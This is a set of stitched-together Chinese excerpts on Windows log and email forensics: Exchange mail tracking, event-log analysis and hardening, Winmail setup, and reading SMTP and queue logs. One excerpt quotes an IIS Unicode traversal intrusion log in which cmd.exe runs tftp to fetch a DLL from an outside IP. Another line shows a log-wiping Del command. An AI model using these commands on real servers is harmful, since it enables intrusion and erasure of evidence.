winmail如何分析邮件日志
电子邮件取证分析——微软Exchange邮箱系统取证
电子邮件取证分析——微软Exchange邮箱系统取证作者:许子桓,查阳,蔡梓祺来源:《中国新通信》 2018年第7期一、电子邮件取证介绍电子邮件取证属于计算机取证的范畴,是分析出电子邮件真正的发送者、接收者、发送时间和发送地点的过程。
电子邮件的证据主要来自户邮箱、网络数据记录、服务器上的记录、用户使用的硬盘等。
Exchange Server 是Microsoft 公司推出的一套功能丰富的电子邮件服务组件,可以与Outlook个人电子邮件系统配合使用。
鉴于其强大的邮件业务处理功能,目前国内外大部分大型公司都以这款Exchange 邮箱来作为公司内部的的办公邮件系统。
以下的部分我们将剖析Exchange 的邮件取证分析功能。
二、电子邮件取证分析——针对微软Exchange 邮箱系统取证分析关于Exchange 2016 的框架,可以从Microsoft 官网的技术文档上获得Exchange 2016的架构。
在Microsoft 本地环境中,数据库可用性组 (DAG) 是Exchange 邮箱系统的核心功能模块,其内部是一组邮箱服务器。
它向前处理来自因特网的客户端访问并与边缘传输服务器进行交互,向后负责一组数据库的管理,而且还要提供数据库、网络和服务器故障的数据库级自动恢复功能。
更详细地说,邮箱服务器提供能够接受所有协议(SMTP,HTTP 等)的客户端访问服务。
这些前端服务负责将连接路由代理服务器到邮箱服务器上相应的后端服务。
对于用户来说,客户端不必直接连接最深层的数据库,而是由邮箱服务器负责中间的一系列操作。
当用户通过Exchange 的客户端发送邮件时,邮件至少需要遍历一台MIcrosoft 的本地邮箱服务器,这成为了邮件取证的有力支撑。
Exchange 提供了邮件追踪功能。
Exchange 的邮件服务器对处理过的每一封邮件生成邮件追踪日志,包括经过邮箱服务器和边缘传输服务器的邮件的所有的操作行为。
windows系统日志分析
(1)unicode漏洞入侵日志记录
这个是个非常经典的漏洞了,要找这样的服务器估计得去国外慢慢找了,但是因为它的日志是最经典的一个,所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\ system32\LogFiles\文件夹下,如图1所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用 GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的“文件夹选择属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。进行了上面的设置后,直接通过Del C:\*.Evt/s/q来删除是删不掉的,相对要安全很多了。
我们配合入侵来看下这样的记录:通过下面的编码我们在入侵的时候可以查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
Windows系统中的系统日志分析方法
Windows系统中的系统日志分析方法Windows操作系统拥有强大且详细的系统日志功能,可以记录操作系统运行过程中的各种事件和错误信息。
通过分析这些系统日志,管理员可以及时发现并解决系统问题,提高系统的可靠性和性能。
本文将介绍Windows系统中的系统日志分析方法。
一、系统日志的分类系统日志主要分为三类:应用程序日志、安全日志和系统日志。
应用程序日志用来记录与特定应用程序相关的事件信息,包括应用程序的错误、警告和信息等。
安全日志记录安全审计和访问控制信息,用于监视系统的安全状况。
系统日志则记录系统组件和操作系统自身的事件信息,包括启动和关闭事件、硬件错误和系统性能等。
二、系统日志的查看1. 打开事件查看器在Windows操作系统中,可以通过“管理工具”中的“事件查看器”来查看系统日志。
也可以使用“运行”对话框中的“eventvwr.msc”命令快速打开事件查看器窗口。
2. 选择日志类型在事件查看器窗口中,左侧面板中列出了三类日志类型:“应用程序和服务日志”、“Windows日志”和“安全日志”。
根据需要,选择相应的日志类型即可查看对应的系统日志。
三、系统日志的分析1. 了解事件的级别和类别事件查看器中,每个日志条目都有一个事件级别和事件类别。
事件级别主要分为四个等级:信息(Information)、警告(Warning)、错误(Error)和严重错误(Critical)。
事件类别则根据不同的日志类型而有所不同,比如应用程序日志中的事件类别包括应用程序错误、应用程序警告和应用程序信息等。
2. 过滤和排序日志为了更好地查找和分析系统日志,可以使用事件查看器中的过滤功能。
可以按照事件级别、事件源和关键字等进行日志过滤,只显示关注的日志信息。
此外,还可以对日志进行排序,按照时间、事件级别等进行排序,便于分析和比对。
3. 解读事件描述每个日志条目包含事件描述和相关详细信息,其中会有关键字、错误码等信息。
Windows系统日志分析技巧
Windows系统日志分析技巧Windows系统日志是操作系统记录各种事件的重要记录工具,通过分析系统日志可以帮助我们了解系统运行状况、排查问题和改善系统性能。
本文将介绍一些Windows系统日志分析的常用技巧,帮助读者更好地利用系统日志。
1. 概述Windows系统日志主要包含应用程序日志、安全日志、系统日志和事件订阅日志。
应用程序日志包含了与特定应用程序相关的事件和错误信息;安全日志用于记录系统登录、访问权限和安全策略相关的事件;系统日志则包含操作系统本身的事件和错误信息;事件订阅日志用于跟踪订阅发布的事件。
2. 了解日志分类在进行系统日志分析前,我们首先要对系统日志的分类有所了解。
通过观察应用程序日志、安全日志、系统日志和事件订阅日志中的事件类型和级别,可以帮助我们聚焦于特定类型的问题。
比如,如果我们遇到了系统崩溃的问题,就应该重点关注系统日志中的错误、警告和关键事件。
3. 使用筛选器Windows系统日志通常会记录大量的事件,为了快速找到我们关心的信息,可以使用筛选器进行过滤。
通过对关键词、事件ID、级别等进行筛选,可以缩小日志内容范围,提高效率。
例如,我们可以使用关键词筛选器查找特定应用程序的错误事件,或者使用级别筛选器查找系统崩溃事件。
4. 分析日志详情系统日志中每个事件都包含详细的信息,我们可以仔细阅读事件的详细描述,以了解事件发生的上下文和影响。
比如,安全日志中的登录事件可以告诉我们登录的用户名、登录类型和登录时间等信息,这些信息对于安全审计和追踪非法登录行为非常重要。
5. 应用统计功能Windows系统日志还提供了一些统计功能,帮助我们更好地了解系统的运行情况。
比如,我们可以使用性能监视器对系统日志进行实时监控,以便快速发现系统资源占用过高或者进程崩溃的问题。
此外,系统还提供了事件查看器和追踪日志等工具,用于高级日志分析和故障排除。
6. 日志备份和归档为了确保日志的完整性和长期保存,我们应该定期备份和归档系统日志。
Windows系统系统日志分析方法
Windows系统系统日志分析方法Windows操作系统是目前最为广泛使用的操作系统之一,其具备强大的系统日志记录功能。
系统日志可以帮助我们了解系统的运行状态,检测和解决潜在的问题。
本文将介绍一些Windows系统系统日志的基本概念和分析方法,帮助读者更好地理解和利用系统日志。
一、Windows系统日志概述Windows系统日志是操作系统内置的日志记录器,用于记录系统和应用程序的事件和错误信息。
系统日志能够记录各种类型的事件,如系统启动、关机、硬件和驱动程序的错误、应用程序的错误等。
通过对系统日志的分析,可以快速定位问题,并采取相应的措施。
二、系统日志的分类Windows系统日志主要分为以下几类:1. 应用程序日志:记录与安装的应用程序相关的事件和错误信息,如应用程序崩溃、配置文件损坏等。
2. 安全日志:记录与系统安全相关的事件和错误信息,如登录、访问权限管理等。
3. 系统日志:记录与系统运行状态相关的事件和错误信息,如硬件故障、服务启动和停止等。
4. 设置日志:记录与系统设置相关的事件和错误信息,如时间、日期和网络设置等。
三、系统日志的查看和分析方法Windows系统提供了多种方法来查看和分析系统日志,以下是一些常用的方法:1. 使用事件查看器:事件查看器是Windows系统内置的日志查看工具,可以通过“开始”菜单 -> “管理工具” -> “事件查看器”来打开。
在事件查看器中,可以选择具体的日志分类,查看日志的详细内容和属性。
2. 使用命令行工具:Windows系统提供了一些命令行工具来查看和分析系统日志,如“eventquery.vbs”和“wevtutil.exe”。
通过命令行工具,可以灵活地筛选和分析系统日志,以满足特定的需求。
3. 使用第三方工具:除了操作系统自带的工具,还有许多第三方工具可以帮助我们更好地查看和分析系统日志。
这些工具通常提供更加友好的界面和功能,可以更方便地进行日志的筛选、搜索和导出等操作。
winmail使用
使用Winmail 架设无病毒邮件系统全攻略六、Winmail 邮件系统的设置1. 快速向导设置在安装完成后,管理员必须对系统进行一些初始化设置,系统才能正常运行。
服务器在启动时如果发现还没有设置域名会自动运行快速设置向导,用户可以用它来简单快速的设置邮件服务器。
用户输入一个要新建的邮箱地址及密码,点击“设置”按钮,设置向导会自动查找数据库是否存在要建的邮箱以及域名,如果发现不存在向导会向数据库中增加新的域名和新的邮箱,同时向导也会测试SMTP、POP3、ADMIN、HTTP 服务器是否启动成功。
设置结束后,在“设置结果”栏中会报告设置信息及服务器测试信息,设置结果的最下面是也会给出有关邮件客户端软件的设置信息。
2. 服务状态检查管理工具登录成功后,使用“系统设置”/“系统服务”查看系统的SMTP、POP3、ADMIN、HTTP、IMAP、LDAP 等服务是否正常运行。
绿色的图标表示服务成功运行;红色的图标表示服务停止。
如果发现SMTP、POP3、ADMIN、HTTP、IMAP 或LDAP 等服务没有起动成功,请使用“系统日志” / “SYSTEM” 查看系统的启动信息。
如果出现启动不成功,一般情况都是端口被占用无法启动,请关闭占用程序或者更换端口再重新启动相关的服务。
例如:在Windows 2000 缺省安装时会安装IIS 的SMTP 服务,从而导致邮件系统SMTP 服务起不来。
如果你找不到占用程序,可以用一个名为Active Ports 的工具软件查看那个程序占用了端口,可到/download_other.php#viewport下载。
3. SMTP 基本参数设置打开Winmail 管理工具,在“系统设置”->“SMTP设置”->“基本参数”下设置有关参数,这些参数关系到邮件能否正常收发,因此请根据具体情况合理、规范的设置。
1)错误邮件的回收邮箱: 默认为postmaster@ ,当系统有错误邮件不知往那里递送时,会递送到该信箱。
Windows系统日志取证分析简述
• 21•计算机犯罪现象越来越多,预防与遏制它们成为当前社会的技术难题,任何人在计算机中的操作都会在日志文件中留下痕迹。
日志文件种类很多,需要关注各种类型的日志文件进行合并取证分析。
首先介绍了Windows 日志,包括系统日志、安全日志、应用程序日志,然后说明了Windows 日志中事件类型,然后从web 日志的分析入手,剖析不同的日志文件我们分析时所要注意的重点内容。
日志分析对计算机取证有重要作用。
某一个日志会记录它所在系统或应用程序的各种信息。
在进行计算机取证分析时,我们要全面的分析多个日志文件,如果仅对单一日志文件分析那么我们可能会漏掉许多信息。
我们需要做的就是把所有获取的日志文件进行比对、整合、关联使得他们能够为我们形成一个较为完整的犯罪场景,为我们的进一步工作提供支持。
1 日志1.1 日志的概念日志(Log)起源于航海日志。
航海日志就是我们航海归来之后我们可以对在海上的工作进行分析,总的来说就是一个海上的日记。
日志(Log)表示在时间上连续地设置有由系统指定的对象的动作及其动作结果。
为了保持计算机系统资源的运行状态,系统会将任何活动和在操作中出现的一系列情况进行详细记录,并保存它们。
这些信息对于电脑犯罪取证人员来说是非常有用的。
1.2 Windows日志日志文件不同于我们系统中的其他文件,它有着不一样的用处与作用。
目前计算机中使用最多的Windows 操作系统,如今越来越多的Windows 操作系统日志以二进制形式保存,他们有着自己的存储方式,就是循环覆盖缓存。
它们记录了用户在系统里面完成了什么操作,还有做出了什么样的错误指令以及其他的一些记录。
我们通过查看系统的这些文件,不仅可以回看用户正确操作,同时也可以去搜索那些的错误操作以及不是系统用户本人做出的操作。
因此,无论是系统管理者还是黑客,都非常重视这些文件。
管理员可以通过这些文件查看系统的安全状态,并且找到入侵者的IP 地址或各种入侵证据。
windows系统日志分析
2. 设置文件访问权限
修改了日志文件的存放目录后,日志还是可以被清空的,下面通过修改日志文件访问权限,防止这种事情发生,前提是Windows系统要采用NTFS文件系统格式。
右键点击D盘的CCE目录,选择“属性”,切换到“安全”标签页后,首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号,只给它赋予“读取”权限;然后点击“添加”按钮,将“System”账号添加到账号列表框中,赋予除“完全控制”和“修改”以外的所有权限,最后点击“确定”按钮。这样当用户清除Windows日志时,就会弹出错误对话框。
二、Windows日志实例分析
在Windows日志中记录了很多操作事件,为了方便用户对它们的管理,每种类型的事件都赋予了一个惟一的编号,这就是事件ID。
1. 查看正常开关机记录
在Windows系统中,我们可以通过事件查看器的系统日志查看计算机的开、关机记录,这是因为日志服务会随计算机一起启动或关闭,并在日志留下记录。这里我们要介绍两个事件ID“6006和6005”。6005表示事件日志服务已启动,如果在事件查看器中发现某日的事件ID号为6005的事件,就说明在这天正常启动了Windows系统。6006表示事件日志服务已停止,如果没有在事件查看器中发现某日的事件ID号为6006的事件,就表示计算机在这天没有正常关机,可能是因为系统原因或者直接切断电源导致没有执行正常的关机操作。
笔者以应用程序日志为例,将其转移到“d:\cce”目录下。选中Application子项(如图),在右栏中找到File键,其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”,将它修改为“d:cceAppEvent.Evt”。接着在D盘新建“CCE”目录,将“AppEvent.Evt”拷贝到该目录下,重新启动系统,完成应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同,只是在不同的子项下操作,或建立一系列深目录以存放新日志文件,如D:\01\02\03\04\05\06\07,起名的原则就是要“越不起眼,越好”。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
如何分析邮件收发日志?
一封邮件不管是外面系统发来的,还是本系统发的,都先连接系统smtp 服务,系统接收下来后放在队列里再做递送, 所以可以分析SMTP 和queue 队列日志:
找到某个邮件的SMTP日志,可以根据发信时间来找,mail from 是发信人rcpt to 是收信人,时间后面的数字4016 为每个邮件的处理标识,相同的处理标识就是同一封邮件的处理过程。
2010/06/24-10:01:38 4016 Connect from 127.0.0.1, relayclient set 从哪里来的连接127.0.0.1是本机
2010/06/24-10:01:38 4016 remote ehlo = WebMail 申明的ehlo名,Webmail结合上面的127.0.01 说明来自网页登录的
2010/06/24-10:01:38 4016 max msg size = 0
2010/06/24-10:01:38 4016 smtp authenticate success! Username = test 认证用户名
2010/06/24-10:01:38 4016 remote sent 'mail from' = FROM:
2010/06/24-10:01:38 4016 mail from = test@
2010/06/24-10:01:38 4016 remote sent 'rcpt to' = TO:
2010/06/24-10:01:38 4016 rcpt to = ccc@
2010/06/24-10:01:38 4016 smtp data
2010/06/24-10:01:38 4016 go ahead, end data with CRLF.CRLF
2010/06/24-10:01:38 4016 data bytes received = 1011
2010/06/24-10:01:38 4016 message[1277344898.2902.4016,S=1164] accepted for delivery 邮件后台生成的邮件数据的文件名
2010/06/24-10:01:38 4016 quit
2010/06/24-10:01:38 4016 end connection 邮件接收正常结束
通过上面的SMTP日志中的红色部分可以在queue日志(队列日志)查找
队列日志分析方法如下:(处理标识相同的就是同一封邮件的处理过程)
2008/06/11-09:18:51 12408 new message[1213147130.9669.15220,S=1174] 开始投递2008/06/11-09:18:51 12408 bytes 1174 from aaa@ 发信人
2008/06/11-09:18:51 12408 starting delivery: to remote bbb@ 收信人
2008/06/11-09:18:51 12408 deliver to remote server 209.85.199.27 收信方邮件服务器地址2008/06/11-09:18:51 12408 [<--]: 220 ESMTP f21si17539450rvb.0 以下是smtp通信的命令交互
2008/06/11-09:18:51 12408 [-->]: EHLO
2008/06/11-09:18:52 12408 [<--]: at your service, [218.71.143.71] 2008/06/11-09:18:52 12408 [<--]: 250-SIZE 28311552
2008/06/11-09:18:52 12408 [<--]: 250-8BITMIME
2008/06/11-09:18:52 12408 [<--]: 250 ENHANCEDSTATUSCODES
2008/06/11-09:18:52 12408 [-->]: MAIL FROM:
2008/06/11-09:18:52 12408 [<--]: 250 2.1.0 OK
2008/06/11-09:18:52 12408 [-->]: RCPT TO:
2008/06/11-09:18:52 12408 [<--]: 250 2.1.5 OK
2008/06/11-09:18:52 12408 [-->]: DATA
2008/06/11-09:18:52 12408 [<--]: 354 Go ahead
2008/06/11-09:18:52 12408 [***]: Transporting message (1174 bytes)
2008/06/11-09:18:52 12408 [***]: Finished transport
2008/06/11-09:18:53 12408 [<--]: 250 2.0.0 OK 1213147225 f21si17539450rvb.0
2008/06/11-09:18:53 12408 [-->]: QUIT 完成
2008/06/11-09:18:53 12408 delivery success 递交成功
2008/06/11-09:18:53 12408 end message[1213147130.9669.15220,S=1174] 结束
如果递交不成功会有错误的.像下面这个.就会收到退信.如果你设了中继第一次递交不成功后会有个中继再递交的动作.这里看到是成功,此这个邮件已经到对方的服务器中了.
2008/06/11-09:37:07 15316 [***]: Transporting message (76260 bytes)
2008/06/11-09:37:07 15316 [***]: Finished transport
2008/06/11-09:37:08 15316 [<--]: 550 Error: content rejected./zh_CN/help/content/rejectedmail.html
2008/06/11-09:37:08 15316 [-->]: QUIT
2008/06/11-09:37:08 15316 delivery failure: aaa@, remote server said (111.15.111.111) : 550 Error: content
rejected./zh_CN/help/content/rejectedmail.html
. (#3.0.7)
如果是发到内部用户的。
队列日志会比较简单,出错的话也可以在其中看到。
如下:
2011/02/24-13:22:13 172804 new message[1298524933.7505.170412,S=182]
2011/02/24-13:22:13 172804 bytes 182 from a@
2011/02/24-13:22:13 172804 starting delivery: to local a@
2011/02/24-13:22:13 172804 delivery success
2011/02/24-13:22:13 172804 end message[1298524933.7505.170412,S=182]。